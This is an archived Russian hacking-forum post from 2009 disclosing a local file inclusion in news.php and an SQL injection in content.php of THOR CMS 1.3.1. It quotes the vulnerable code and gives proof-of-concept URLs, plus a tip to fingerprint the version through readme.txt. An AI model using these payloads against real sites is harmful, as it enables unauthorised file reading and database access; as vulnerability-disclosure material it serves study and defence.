ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Энциклопедия уязвимых скриптов
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

THOR CMS VERSION 1.3.1
  #11  
Старый 20.11.2009, 04:08
Аватар для Ins3t
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691

Репутация: 330
По умолчанию THOR CMS VERSION 1.3.1
THOR CMS VERSION 1.3.1

CMS - каким то кривым образом сделана на основе phpbb, а может и является ему дополнением (руки б оторвать тому кто его писал).

Local File Include in news.php:

register_globals = ON

PHP код:
...
include($phpbb_root_path 'common.'.$phpEx);
... 
PoC:

Код:
http://localhost/24/news.php?phpEx=./../FILE
SQL injection in content.php:

PHP код:
...
$dyn_id $HTTP_GET_VARS['dyn_id'];
$sql "SELECT * FROM " CMS_DYN " WHERE id = ".$dyn_id."";
... 
PoC:

Код:
http://localhost/24/content.php?dyn_id=[SQL]
CMS VERSION:

Код:
http://localhost/24/readme.txt
Обычно этот файл НЕ удаляют!
Последний раз редактировалось Ins3t; 20.11.2009 в 23:21..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30
Основные методы взлома и защиты скриптов на Php DIAgen Авторские статьи 8 28.05.2006 12:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ